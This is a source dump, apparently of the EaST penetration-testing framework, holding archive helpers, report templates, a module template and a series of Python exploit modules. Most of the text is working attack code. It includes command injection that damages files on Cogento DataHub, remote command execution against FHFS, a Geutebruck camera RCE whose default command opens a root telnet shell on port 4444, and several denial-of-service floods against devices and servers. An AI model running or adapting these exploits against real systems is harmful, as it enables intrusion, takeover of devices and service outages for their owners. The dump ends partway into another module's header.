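    def __add_file_to_manifest(self, filename):
        # NOTE(review): the literal has no "{filename}" placeholder, so .format()
        # has no effect and every entry is recorded as "(unknown)". This looks like
        # an artefact of how the page was rendered — confirm against the original
        # source before changing the literal.
        self.manifest += "Name: (unknown)\n\n".format(filename=filename)

    def create_manifest(self):
        """Write the accumulated manifest into the archive (the manifest does not list itself)."""
        self.add_file("META-INF/MANIFEST.MF", self.manifest, write_to_manifest=False)
        self.is_manifest_created = True

    def get_raw(self, remove_temp=False):
        """Return the archive bytes, writing the manifest first if needed.

        With remove_temp=True the on-disk file is deleted after it was read.
        If no archive was ever created only a message is printed; the following
        open('') then fails with IOError.
        """
        if not self.is_manifest_created:
            self.create_manifest()
        if not self.name:
            print('You should create jar file before get raw content')
        with open(self.name, 'rb') as f:
            content = f.read()
        if remove_temp:
            os.remove(self.name)
        return content

    def get_jar(self):
        """Return the on-disk path of the archive, writing the manifest first if needed."""
        if not self.is_manifest_created:
            self.create_manifest()
        return self.name
# -------------------------------------------------------------------------------- /core/helpers/archieve/zip.py: --------------------------------------------------------------------------------
import zipfile
import os


class Zip:
    """Thin wrapper around zipfile for building an archive entry by entry.

    `name` is the path of the archive on disk; `files` lists the entry names
    added through add_file() so that duplicate names can be rejected.
    """

    def __init__(self, filename=''):
        self.name = filename
        self.files = []
        if filename:
            self.create_archieve(filename)

    def create_archieve(self, filename):
        """Create an empty archive at `filename`, adopting it as self.name if none was set.

        NOTE(review): when self.name is already set to a different path, the
        empty archive is still created at `filename` while self.name stays as
        it was — presumably unintended; confirm with callers.
        """
        if not self.name:
            self.name = filename
        # Mode 'w' truncates any existing file at that path.
        with zipfile.ZipFile(filename, 'w'):
            pass

    def add_file(self, name, content=''):
        """Append one entry to the archive.

        With a non-empty `content` the entry is written from that string.
        Without it, the local file at path `name` is read from disk — `name`
        then doubles as a filesystem path, so it must come from a trusted caller.
        Raises Exception (via is_valid) when the archive does not exist, is not
        a zip file, or already holds an entry called `name`.
        """
        if not self.is_valid(name):
            return
        with zipfile.ZipFile(self.name, 'a') as zf:
            if content:
                zf.writestr(name, content)
            else:
                zf.write(name)
        # Record the entry so that is_valid() can reject a second entry with
        # the same name.
        self.files.append(name)

    def is_valid(self, filename=''):
        """Check that the archive exists, is a zip file and does not already hold `filename`.

        Returns True on success; every failure raises Exception with a message.
        """
        if not self.name:
            raise Exception("Error. Zip archieve is not created.")
        if not zipfile.is_zipfile(self.name):
            raise Exception("Error. File {name} is not zip archieve.".format(name=self.name))
        if filename and filename in self.files:
            raise Exception("Error. There is file with the same name.")
        return True
# -------------------------------------------------------------------------------- /core/helpers/java/__init__.py: --------------------------------------------------------------------------------
# https://raw.githubusercontent.com/C0reL0ader/EaST/4b1ab5333022bbd476e9a43f13c4a4b559488752/core/helpers/java/__init__.py
# -------------------------------------------------------------------------------- /data/CVE-2015-8103/serialized_class_loader: --------------------------------------------------------------------------------
# https://raw.githubusercontent.com/C0reL0ader/EaST/4b1ab5333022bbd476e9a43f13c4a4b559488752/data/CVE-2015-8103/serialized_class_loader
# -------------------------------------------------------------------------------- /data/CVE-2015-8103/serialized_file_writer: --------------------------------------------------------------------------------
# https://raw.githubusercontent.com/C0reL0ader/EaST/4b1ab5333022bbd476e9a43f13c4a4b559488752/data/CVE-2015-8103/serialized_file_writer
# -------------------------------------------------------------------------------- /data/CVE-2015-8103/serialized_jenkins_header: --------------------------------------------------------------------------------
# Protocol:CLI-connect
# --------------------------------------------------------------------------------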
/data/CVE-2015-8103/serialized_payload_footer: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/C0reL0ader/EaST/4b1ab5333022bbd476e9a43f13c4a4b559488752/data/CVE-2015-8103/serialized_payload_footer -------------------------------------------------------------------------------- /data/CVE-2015-8103/serialized_payload_header: -------------------------------------------------------------------------------- 1 | <===[JENKINS REMOTING CAPACITY]===> -------------------------------------------------------------------------------- /data/report_templates/common.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Report 6 | 30 | 31 | 32 |
33 |

Server was started at: %s

34 |

Succeeded modules: %s

35 |

Failed modules: %s

36 |
37 | %s 38 | 39 | -------------------------------------------------------------------------------- /data/report_templates/row_template.html: -------------------------------------------------------------------------------- 1 |
2 |
Name: {MODULE_NAME} ({IS_SUCCESS})
3 |
Description:
{DESCRIPTION} 4 |
Notes:
{NOTES} 5 | {OPTIONS} 6 | {LISTENER} 7 |
Module out:
{LOG} 8 | 9 |
Cve: {CVE}
10 |
11 |
12 |
-------------------------------------------------------------------------------- /docs/files/template.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | #IMPORTS SECTION 4 | from collections import OrderedDict # for rigth options order 5 | from Sploit import Sploit # base class for module 6 | #INFO SECTION 7 | INFO = {} 8 | INFO['NAME'] = '' # Module name 9 | INFO['DESCRIPTION'] = '' # Short description of vulnerability 10 | INFO['VENDOR'] = '' # Vulnerable soft vendor's homepage 11 | INFO['CVE Name'] = '' # CVE if exists(like 2017-9999) 12 | INFO['NOTES'] = """ """ # Full description of vulnerability 13 | INFO['DOWNLOAD_LINK'] = '' # Link to vulnerable soft 14 | INFO['LINKS'] = [] # Some helpful links(like exploit's page on exploit-db or link to some article) 15 | INFO['CHANGELOG'] = '' # Usually it's exploit writing date 16 | INFO['PATH'] = 'General/' # Virtual path of module. It used by module tree in GUI 17 | 18 | # OPTIONS SECTION 19 | OPTIONS = OrderedDict() 20 | OPTIONS['HOST'] = '127.0.0.1' 21 | OPTIONS['PORT'] = 9999 22 | 23 | 24 | class exploit(Sploit): 25 | def __init__(self,host="", 26 | port=0, ssl=False, 27 | logger=None): 28 | Sploit.__init__(self, logger=logger) 29 | 30 | def args(self): 31 | self.args = Sploit.args(self, OPTIONS) 32 | 33 | def run(self): 34 | #Get options from gui 35 | self.args() 36 | #YOUR CODE 37 | 38 | ########## 39 | self.finish(True) 40 | 41 | 42 | if __name__ == '__main__': 43 | print "Running exploit %s .. 
" % INFO['NAME'] 44 | e = exploit("192.168.0.1", 80) 45 | e.run() 46 | -------------------------------------------------------------------------------- /docs/files/vulnserver_bof/vulnserver.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/C0reL0ader/EaST/4b1ab5333022bbd476e9a43f13c4a4b559488752/docs/files/vulnserver_bof/vulnserver.jpg -------------------------------------------------------------------------------- /docs/files/vulnserver_bof/vulnserver2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/C0reL0ader/EaST/4b1ab5333022bbd476e9a43f13c4a4b559488752/docs/files/vulnserver_bof/vulnserver2.jpg -------------------------------------------------------------------------------- /docs/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | EaST Tutorials 5 | 6 | 7 | 8 | 9 |
10 |
Bootstrap test
11 |
12 | Bootstrap test 13 |
14 |
15 | 16 | 17 | -------------------------------------------------------------------------------- /exploits/ef_cogento_datahub_afd.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # The exploit is a part of EaST pack - use only under the license agreement 3 | # specified in LICENSE.txt in your EaST distribution 4 | 5 | import sys 6 | import time 7 | import urllib2 8 | 9 | sys.path.append("./core") 10 | from Sploit import Sploit 11 | 12 | INFO = {} 13 | INFO['NAME'] = "ef_cogento_datahub_fd" 14 | INFO['DESCRIPTION'] = "Cogento DataHub =< v.7.3.9.364 File Damager Exploit" 15 | INFO['VENDOR'] = "http://www.cogentdatahub.com" 16 | INFO["CVE Name"] = "" 17 | INFO["NOTES"] = """ 18 | The exploit allows to damage any file at victim system by dumping data to it. Cogento DataHub v.7.3.9.364. Windows XP SP3.""" 19 | 20 | INFO['CHANGELOG'] = "07 Sep, 2015. Written by Gleg team." 21 | INFO['PATH'] = 'Exploits/' 22 | 23 | # Must be in every module, to be set by framework 24 | OPTIONS = {} 25 | OPTIONS["HOST"] = "127.0.0.1" 26 | OPTIONS["PORT"] = "80" 27 | OPTIONS["FILENAME"] = 'c:/boot.ini' 28 | 29 | class exploit(Sploit): 30 | def __init__(self, host = "", port = 0, logger = None): 31 | Sploit.__init__(self, logger = logger) 32 | self.name = INFO['NAME'] 33 | self.port = port 34 | self.host = host 35 | self.filename = None 36 | self.state = "running" 37 | return 38 | 39 | def args(self): 40 | self.args = Sploit.args(self, OPTIONS) 41 | self.host = self.args.get('HOST', self.host) 42 | self.port = int(self.args.get('PORT', self.port)) 43 | self.filename = self.args.get('FILENAME', 'c:/boot.ini') 44 | return 45 | 46 | def make_url(self, path = ''): 47 | return 'http://{}:{}{}'.format(self.host, self.port, path) 48 | 49 | def run(self): 50 | self.args() 51 | self.log('Try do damage file: {}'.format(self.filename)) 52 | 53 | stage1 = self.make_url('/Silverlight/GetPermissions.asp?username=nil nil)(dump {}&password=') 
54 | stage1 = stage1.format(self.filename).replace(' ', '%20') 55 | 56 | try: 57 | req = urllib2.urlopen(stage1).read() 58 | self.log('Success!') 59 | self.finish(True) 60 | return 1 61 | except Exception as ex: 62 | self.log('Failed!') 63 | print ex 64 | self.finish(False) 65 | return 0 66 | 67 | if __name__ == '__main__': 68 | """ 69 | By now we only have the tool mode for exploit.. 70 | Later we would have standalone mode also. 71 | """ 72 | print "Running exploit %s .. " % INFO['NAME'] 73 | e = exploit("192.168.0.1", 80) 74 | e.run() -------------------------------------------------------------------------------- /exploits/ef_fhfs_rce.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | # -*- coding: utf_8 -*- 3 | # The exploit is a part of EAST Framework - use only under the license agreement specified in LICENSE.txt in your EAST Framework distribution 4 | 5 | import sys 6 | import socket 7 | 8 | sys.path.append("./core") 9 | from Sploit import Sploit 10 | 11 | INFO = {} 12 | INFO['NAME'] = "ef_fhfs_rce" 13 | INFO['DESCRIPTION'] = "FHFS - FTP/HTTP File Server 2.1.2 Remote Command Execution" 14 | INFO['VENDOR'] = "http://sourceforge.net/projects/fhfs/" 15 | INFO['DOWNLOAD_LINK'] = 'http://sourceforge.net/projects/fhfs/' 16 | INFO['LINKS'] = 'https://www.exploit-db.com/exploits/37985/' 17 | INFO["CVE Name"] = "" 18 | INFO["NOTES"] = """ 19 | FHFS is a FTP and HTTP Web Server package, transparently based on HFS and FileZilla. FHFS is built to act as an all-in-one user-based file hosting website, good for schools, businesses, etc. whose students/employees need to easily transport files. 20 | """ 21 | INFO['CHANGELOG'] = "08 Sep 2015. Written by Gleg team." 
22 | INFO['PATH'] = 'Exploits/General/' 23 | 24 | # Must be in every module, to be set by framework 25 | OPTIONS = {} 26 | OPTIONS["HOST"] = "127.0.0.1" 27 | OPTIONS["PORT"] = "80" 28 | OPTIONS["CMD"] = 'stop.bat' 29 | 30 | class exploit(Sploit): 31 | def __init__(self, host = "", port = 0, logger = None): 32 | Sploit.__init__(self, logger = logger) 33 | self.name = INFO['NAME'] 34 | self.cmd = OPTIONS['CMD'] 35 | self.host = host 36 | self.port = port 37 | self.state = "running" 38 | return 39 | 40 | def args(self): 41 | self.args = Sploit.args(self, OPTIONS) 42 | self.host = self.args.get('HOST', self.host) 43 | self.port = int(self.args.get('PORT', self.port)) 44 | self.cmd = self.args.get('CMD', self.cmd) 45 | return 46 | 47 | def run(self): 48 | self.args() 49 | 50 | client = socket.socket() 51 | try: 52 | client.connect((self.host, self.port)) 53 | data = "GET /?{.exec|" + self.cmd + ".} HTTP/1.1\r\n\r\n" 54 | client.send(data) 55 | client.close() 56 | self.log('Success. Command executed') 57 | self.finish(True) 58 | return 1 59 | except: 60 | self.log('Failed') 61 | self.finish(False) 62 | return 0 63 | 64 | if __name__ == '__main__': 65 | """ 66 | By now we only have the tool mode for exploit.. 67 | Later we would have standalone mode also. 68 | """ 69 | print "Running exploit %s .. " % INFO['NAME'] 70 | e = exploit("192.168.0.1", 80) 71 | e.run() -------------------------------------------------------------------------------- /exploits/efa_aastra_6755i_SIP_SP4_dos.py: -------------------------------------------------------------------------------- 1 | #! 
/usr/bin/env python 2 | # -*- coding: utf_8 -*- 3 | # The exploit is a part of EAST Framework - use only under the license agreement specified in LICENSE.txt in your EAST Framework distribution 4 | 5 | import os 6 | import sys 7 | 8 | import urllib2 9 | 10 | sys.path.append("./core") 11 | from Sploit import Sploit 12 | 13 | INFO = {} 14 | INFO['NAME'] = "efa_aastra_6755i_SIP_SP4_dos" 15 | INFO['DESCRIPTION'] = "Aastra 6755i SIP SP4 - Unauthorized Remote Reboot" 16 | INFO['VENDOR'] = "http://www.aastra.sg/" 17 | INFO['DOWNLOAD_LINK'] = '' 18 | INFO['LINKS'] = ['https://www.exploit-db.com/exploits/44142/'] 19 | INFO["CVE Name"] = "" 20 | INFO["NOTES"] = """Unauthorized Remote Reboot by simple GET request 21 | """ 22 | 23 | INFO['CHANGELOG'] = "19 Feb, 2018. Written by Gleg team." 24 | INFO['PATH'] = 'Exploits/Hardware/' 25 | 26 | # Must be in every module, to be set by framework 27 | OPTIONS = {} 28 | OPTIONS['HOST'] = '127.0.0.1', dict(description = 'Target IP') 29 | OPTIONS["PORT"] = 8181, dict(description = 'Target PORT') 30 | 31 | class exploit(Sploit): 32 | def __init__(self, host = "", port = 0, logger = None): 33 | Sploit.__init__(self, logger = logger) 34 | self.name = INFO['NAME'] 35 | self.port = port 36 | self.host = host 37 | self.ssl = False 38 | 39 | def args(self): 40 | self.args = Sploit.args(self, OPTIONS) 41 | self.port = int(self.args.get('PORT', self.port)) 42 | self.host = self.args.get('HOST', self.host) 43 | 44 | def make_url(self, path = ''): 45 | return '{}{}:{}{}'.format(self.prot(), self.host, self.port, path) 46 | 47 | def prot(self): 48 | return self.ssl and 'https://' or 'http://' 49 | 50 | #def check(self): 51 | # u = self.make_url('/crashlog.html') 52 | 53 | def run(self): 54 | self.args() 55 | self.log("Attacking {}".format(self.host)) 56 | 57 | url = self.make_url('/confirm.html') 58 | try: 59 | fd = urllib2.urlopen(url) 60 | except Exception as e: 61 | self.log(e) 62 | 63 | self.finish(True) 64 | 65 | if __name__ == '__main__': 66 | 
""" 67 | By now we only have the tool mode for exploit.. 68 | Later we would have standalone mode also. 69 | """ 70 | 71 | print "Running exploit %s .. " % INFO['NAME'] 72 | e = exploit('', 80) 73 | e.run() 74 | -------------------------------------------------------------------------------- /exploits/efa_autodesk_backburner_manager_dos.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | # -*- coding: utf_8 -*- 3 | # The exploit is a part of EAST Framework - use only under the license agreement specified in LICENSE.txt in your EAST Framework distribution 4 | 5 | import sys 6 | import os 7 | import time 8 | import socket 9 | import time 10 | 11 | sys.path.append('./core') 12 | from Sploit import Sploit 13 | 14 | INFO = {} 15 | INFO['NAME'] = "efa_autodesk_backburner_manager_dos" 16 | INFO['DESCRIPTION'] = "Autodesk Backburner Manager 3 < 2016.0.0.2150 - Null Dereference Denial of Service" 17 | INFO['VENDOR'] = "" 18 | INFO['DOWNLOAD_LINK'] = 'https://www.exploit-db.com/apps/dbb06aaacacf59ba0415c4dca0b1dba6-Backburner2016.0.0_2150_WIN.zip' 19 | INFO['LINKS'] = ['https://www.exploit-db.com/exploits/41160/'] 20 | INFO["CVE Name"] = "" 21 | INFO["NOTES"] = """ 22 | """ 23 | INFO['CHANGELOG'] = "27 Jan, 2016. Written by Gleg team." 
24 | INFO['PATH'] = 'Exploits/Dos/' 25 | 26 | # Must be in every module, to be set by framework 27 | OPTIONS = {} 28 | OPTIONS["HOST"] = "127.0.0.1", dict(description = 'Target IP') 29 | OPTIONS["PORT"] = 3234, dict(description = 'Target port') 30 | 31 | 32 | class exploit(Sploit): 33 | def __init__(self, host = "", port = 0, logger = None): 34 | Sploit.__init__(self, logger = logger) 35 | self.name = INFO['NAME'] 36 | self.port = port 37 | self.host = host 38 | 39 | def args(self): 40 | self.args = Sploit.args(self, OPTIONS) 41 | self.host = self.args.get('HOST', self.host) 42 | self.port = int(self.args.get('PORT', self.port)) 43 | return 44 | 45 | def run(self): 46 | self.args() 47 | self.log("") 48 | 49 | packet = "set data\r\n" 50 | 51 | s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 52 | #s1.settimeout(1) 53 | try: 54 | s1.connect((self.host, self.port)) 55 | self.log(s1.recv(4096)) 56 | self.log(s1.recv(4096)) 57 | time.sleep(1) 58 | self.log('Send malicious packet') 59 | s1.sendall(packet) 60 | s1.close() 61 | except Exception as e: 62 | self.log(e) 63 | self.finish(False) 64 | 65 | self.finish(True) 66 | 67 | if __name__ == '__main__': 68 | """ 69 | By now we only have the tool mode for exploit.. 70 | Later we would have standalone mode also. 71 | """ 72 | 73 | print "Running exploit %s .. " % INFO['NAME'] 74 | e = exploit('', 80) 75 | e.run() 76 | -------------------------------------------------------------------------------- /exploits/efa_blueiris_dos.py: -------------------------------------------------------------------------------- 1 | #! 
/usr/bin/env python 2 | # -*- coding: utf_8 -*- 3 | # The exploit is a part of EAST Framework - use only under the license agreement specified in LICENSE.txt in your EAST Framework distribution 4 | 5 | import sys 6 | import os 7 | import time 8 | import socket 9 | 10 | sys.path.append('./core') 11 | from Sploit import Sploit 12 | 13 | INFO = {} 14 | INFO['NAME'] = "efa_blueiris_dos" 15 | INFO['DESCRIPTION'] = "BlueIris 4.5.1.4 - Denial of Service" 16 | INFO['VENDOR'] = "http://blueirissoftware.com" 17 | INFO['DOWNLOAD_LINK'] = 'http://blueirissoftware.com/blueiris.exe' 18 | INFO['LINKS'] = ['https://www.exploit-db.com/exploits/41474/'] 19 | INFO["CVE Name"] = "" 20 | INFO["NOTES"] = """This module start fake FTP server. Create FTP connection in the software. Use the "Test" button to trigger the vulnerability. 21 | """ 22 | INFO['CHANGELOG'] = "01 Mar, 2017. Written by Gleg team." 23 | INFO['PATH'] = 'Exploits/Dos/' 24 | 25 | # Must be in every module, to be set by framework 26 | OPTIONS = {} 27 | #OPTIONS["HOST"] = "127.0.0.1", dict(description = 'Target IP') 28 | OPTIONS["PORT"] = 21, dict(description = 'Target port') 29 | 30 | 31 | class exploit(Sploit): 32 | def __init__(self, host = "", port = 0, logger = None): 33 | Sploit.__init__(self, logger = logger) 34 | self.name = INFO['NAME'] 35 | self.port = port 36 | self.host = host 37 | 38 | def args(self): 39 | self.args = Sploit.args(self, OPTIONS) 40 | #self.host = self.args.get('HOST', self.host) 41 | self.port = int(self.args.get('PORT', self.port)) 42 | 43 | def run(self): 44 | self.args() 45 | packet = 'A' * 5000 46 | 47 | s = socket.socket() 48 | s.bind(('0.0.0.0', self.port)) 49 | s.listen(5) 50 | 51 | self.log('Wait incoming connection to port {}'.format(self.port)) 52 | conn, addr = s.accept() 53 | conn.send('220 ' + packet + '\r\n') 54 | conn.recv(1024) 55 | conn.send('250 ' + packet + '\r\n') 56 | conn.close() 57 | 58 | self.finish(True) 59 | 60 | if __name__ == '__main__': 61 | """ 62 | By now we only 
have the tool mode for exploit.. 63 | Later we would have standalone mode also. 64 | """ 65 | 66 | print "Running exploit %s .. " % INFO['NAME'] 67 | e = exploit('', 80) 68 | e.run() 69 | -------------------------------------------------------------------------------- /exploits/efa_conext_combox_dos.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | # -*- coding: utf_8 -*- 3 | # The exploit is a part of EAST Framework - use only under the license agreement specified in LICENSE.txt in your EAST Framework distribution 4 | 5 | import sys 6 | import os 7 | import time 8 | import socket 9 | import struct 10 | 11 | sys.path.append('./core') 12 | from Sploit import Sploit 13 | 14 | INFO = {} 15 | INFO['NAME'] = "efa_conext_combox_dos" 16 | INFO['DESCRIPTION'] = "Conext ComBox 865-1058 - Denial of Service" 17 | INFO['VENDOR'] = "http://solar.schneider-electric.com/product/conext-combox/" 18 | INFO['DOWNLOAD_LINK'] = '' 19 | INFO['LINKS'] = ['https://www.exploit-db.com/exploits/41537/'] 20 | INFO["CVE Name"] = "CVE-2017-6019" 21 | INFO["NOTES"] = """The exploit cause the device to self-reboot, constituting a denial of service. Affected all firmware versions prior to V3.03 BN 830 22 | """ 23 | INFO['CHANGELOG'] = "07 Mar, 2017. Written by Gleg team." 
24 | INFO['PATH'] = 'Exploits/Dos/' 25 | 26 | # Must be in every module, to be set by framework 27 | OPTIONS = {} 28 | OPTIONS["HOST"] = "127.0.0.1", dict(description = 'Target IP') 29 | OPTIONS["PORT"] = 80, dict(description = 'Target port') 30 | 31 | 32 | class exploit(Sploit): 33 | def __init__(self, host = "", port = 0, logger = None): 34 | Sploit.__init__(self, logger = logger) 35 | self.name = INFO['NAME'] 36 | self.port = port 37 | self.host = host 38 | 39 | def args(self): 40 | self.args = Sploit.args(self, OPTIONS) 41 | self.host = self.args.get('HOST', self.host) 42 | self.port = int(self.args.get('PORT', self.port)) 43 | return 44 | 45 | def run(self): 46 | self.args() 47 | self.log("Attacking {}".format(self.host)) 48 | 49 | data = "login.cgi?login_username=Nation-E&login_password=DOS&submit=Log+In" 50 | for i in xrange(1, 1000): 51 | try: 52 | s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 53 | s1.connect((self.host, self.port)) 54 | self.log('Send malicious packet') 55 | s1.send("POST /" + data + " HTTP/1.1\r\n") 56 | s1.send("Host: " + self.host + "\r\n\r\n") 57 | s1.close() 58 | except Exception as e: 59 | pass 60 | 61 | self.finish(True) 62 | 63 | if __name__ == '__main__': 64 | """ 65 | By now we only have the tool mode for exploit.. 66 | Later we would have standalone mode also. 67 | """ 68 | 69 | print "Running exploit %s .. " % INFO['NAME'] 70 | e = exploit('', 80) 71 | e.run() 72 | -------------------------------------------------------------------------------- /exploits/efa_easycom_for_php_dos.py: -------------------------------------------------------------------------------- 1 | #! 
/usr/bin/env python 2 | # -*- coding: utf_8 -*- 3 | # The exploit is a part of EAST Framework - use only under the license agreement specified in LICENSE.txt in your EAST Framework distribution 4 | 5 | import sys 6 | import os 7 | import time 8 | import socket 9 | 10 | sys.path.append('./core') 11 | from Sploit import Sploit 12 | 13 | INFO = {} 14 | INFO['NAME'] = "efa_easycom_for_php_dos" 15 | INFO['DESCRIPTION'] = "EasyCom For PHP 4.0.0 - Denial of Service" 16 | INFO['VENDOR'] = "easycom-aura.com" 17 | INFO['DOWNLOAD_LINK'] = '' 18 | INFO['LINKS'] = ['https://www.exploit-db.com/exploits/41426/'] 19 | INFO["CVE Name"] = "" 20 | INFO["NOTES"] = """SQL iPlug listens on port 7078 by default, it suffers from denial of service when sending overly long string via 21 | HTTP requests fed to the "D$EVAL" parameter. 22 | """ 23 | INFO['CHANGELOG'] = "27 Feb, 2016. Written by Gleg team." 24 | INFO['PATH'] = 'Exploits/Dos/' 25 | 26 | # Must be in every module, to be set by framework 27 | OPTIONS = {} 28 | OPTIONS["HOST"] = "127.0.0.1", dict(description = 'Target IP') 29 | OPTIONS["PORT"] = 7078, dict(description = 'Target port') 30 | 31 | 32 | class exploit(Sploit): 33 | def __init__(self, host = "", port = 0, logger = None): 34 | Sploit.__init__(self, logger = logger) 35 | self.name = INFO['NAME'] 36 | self.port = port 37 | self.host = host 38 | 39 | def args(self): 40 | self.args = Sploit.args(self, OPTIONS) 41 | self.host = self.args.get('HOST', self.host) 42 | self.port = int(self.args.get('PORT', self.port)) 43 | 44 | def run(self): 45 | self.args() 46 | packet = 'A' * 43000 47 | 48 | sockets = [] 49 | i = 0 50 | 51 | while True: 52 | try: 53 | sockets.append(socket.create_connection((self.host, self.port))) 54 | sockets[i].send('GET /?D$EVAL=' + packet + " HTTP/1.1\r\n\r\n") 55 | i += 1 56 | self.log('Data sent') 57 | except socket.error as e: 58 | self.log(e) 59 | break 60 | self.finish(True) 61 | 62 | if __name__ == '__main__': 63 | """ 64 | By now we only have the 
tool mode for exploit.. 65 | Later we would have standalone mode also. 66 | """ 67 | 68 | print "Running exploit %s .. " % INFO['NAME'] 69 | e = exploit('', 80) 70 | e.run() 71 | -------------------------------------------------------------------------------- /exploits/efa_extraputty_tftp_dos.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | # -*- coding: utf_8 -*- 3 | # The exploit is a part of EAST Framework - use only under the license agreement specified in LICENSE.txt in your EAST Framework distribution 4 | 5 | import sys 6 | import os 7 | import time 8 | import socket 9 | import struct 10 | 11 | sys.path.append('./core') 12 | from Sploit import Sploit 13 | 14 | INFO = {} 15 | INFO['NAME'] = "efa_extraputty_tftp_dos" 16 | INFO['DESCRIPTION'] = "ExtraPuTTY 0.29-RC2 - Denial of Service" 17 | INFO['VENDOR'] = "http://www.extraputty.com" 18 | INFO['DOWNLOAD_LINK'] = '' 19 | INFO['LINKS'] = ['https://www.exploit-db.com/exploits/41639/'] 20 | INFO["CVE Name"] = "" 21 | INFO["NOTES"] = """ TFTP server component of ExtraPuTTY is vulnerable to remote Denial of Service attack by sending large junk UDP 22 | Read/Write TFTP protocol request packets 23 | """ 24 | INFO['CHANGELOG'] = "21 Mar, 2017. Written by Gleg team." 
25 | INFO['PATH'] = 'Exploits/Dos/' 26 | 27 | # Must be in every module, to be set by framework 28 | OPTIONS = {} 29 | OPTIONS["HOST"] = "127.0.0.1", dict(description = 'Target IP') 30 | OPTIONS["PORT"] = 69, dict(description = 'Target port') 31 | 32 | 33 | class exploit(Sploit): 34 | def __init__(self, host = "", port = 0, logger = None): 35 | Sploit.__init__(self, logger = logger) 36 | self.name = INFO['NAME'] 37 | self.port = port 38 | self.host = host 39 | 40 | def args(self): 41 | self.args = Sploit.args(self, OPTIONS) 42 | self.host = self.args.get('HOST', self.host) 43 | self.port = int(self.args.get('PORT', self.port)) 44 | 45 | def run(self): 46 | self.args() 47 | self.log("Attacking {}".format(self.host)) 48 | 49 | payload = '\x00\x01' + 'A' * 2000 + '\x00netascii\x00' 50 | s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 51 | try: 52 | s.sendto("\x00\x01\TEST\x00\netascii\x00", (self.host, self.port)) 53 | recv = s.recvfrom(255) 54 | if recv != None: 55 | self.log("Send payload to ExtraPuTTY TFTP server") 56 | s.sendto(payload, (self.host, self.port)) 57 | except Exception as e: 58 | self.log('Server not available') 59 | self.finish(False) 60 | self.finish(True) 61 | 62 | if __name__ == '__main__': 63 | """ 64 | By now we only have the tool mode for exploit.. 65 | Later we would have standalone mode also. 66 | """ 67 | 68 | print "Running exploit %s .. " % INFO['NAME'] 69 | e = exploit('', 80) 70 | e.run() 71 | -------------------------------------------------------------------------------- /exploits/efa_geuterbruck_g_cam_rce.py: -------------------------------------------------------------------------------- 1 | #! 
/usr/bin/env python 2 | # -*- coding: utf_8 -*- 3 | # The exploit is a part of EAST Framework - use only under the license agreement specified in LICENSE.txt in your EAST Framework distribution 4 | 5 | import sys 6 | import urllib2 7 | import base64 8 | from time import sleep 9 | 10 | sys.path.append("./core") 11 | from Sploit import Sploit 12 | 13 | INFO = {} 14 | INFO['NAME'] = "efa_geuterbruck_g_cam_rce" 15 | INFO['DESCRIPTION'] = "Geutebruck 5.02024 G-Cam/EFD-2250 - Remote Command Execution" 16 | INFO['VENDOR'] = "http://geutebruck.com" 17 | INFO['DOWNLOAD_LINK'] = '' 18 | INFO['LINKS'] = ['https://www.exploit-db.com/exploits/41360/', 'https://ics-cert.us-cert.gov/advisories/ICSA-17-045-02'] 19 | INFO["CVE Name"] = "2017-5173" 20 | INFO["NOTES"] = """Vulnerability exists in the /uapi-cgi/viewer/testaction.cgi page and allows an anonymous user to execute arbitrary commands with root privileges. Firmware <= 1.11.0.12 are concerned.""" 21 | 22 | INFO['CHANGELOG'] = "16 Feb, 2017. Written by Gleg team." 
23 | INFO['PATH'] = 'Exploits/Hardware/' 24 | 25 | # Must be in every module, to be set by framework 26 | OPTIONS = {} 27 | OPTIONS["HOST"] = "127.0.0.1", dict(description = 'Target IP') 28 | OPTIONS["PORT"] = "80", dict(description = 'Target port') 29 | OPTIONS["COMMAND"] = 'utelnetd -l /bin/sh -p 4444 -d', dict(description = 'Command') 30 | 31 | class exploit(Sploit): 32 | def __init__(self, host="", port=0, logger=None): 33 | Sploit.__init__(self, logger = logger) 34 | self.name = INFO['NAME'] 35 | self.port = port 36 | self.host = host 37 | self.command = "" 38 | 39 | def args(self): 40 | self.args = Sploit.args(self, OPTIONS) 41 | self.host = self.args.get('HOST', self.host) 42 | self.port = int(self.args.get('PORT', self.port)) 43 | self.command = self.args.get('COMMAND', self.command) 44 | 45 | 46 | def make_url(self, path = ''): 47 | return 'http://{}:{}{}'.format(self.host, self.port, path) 48 | 49 | def run(self): 50 | self.args() 51 | 52 | data = 'type=ip&ip=eth0 1.1.1.1;' + self.command 53 | request = urllib2.Request(self.make_url('/uapi-cgi/viewer/testaction.cgi'), data) 54 | 55 | self.log('Sending packet ...') 56 | try: 57 | fd = urllib2.urlopen(request) 58 | self.log(fd.read()) 59 | except Exception as e: 60 | self.log(e) 61 | self.finish(False) 62 | 63 | self.finish(True) 64 | 65 | if __name__ == '__main__': 66 | """ 67 | By now we only have the tool mode for exploit.. 68 | Later we would have standalone mode also. 69 | """ 70 | print "Running exploit %s .. " % INFO['NAME'] 71 | e = exploit("192.168.0.1", 80) 72 | e.run() 73 | 74 | -------------------------------------------------------------------------------- /exploits/efa_home_web_server_rce.py: -------------------------------------------------------------------------------- 1 | #! 
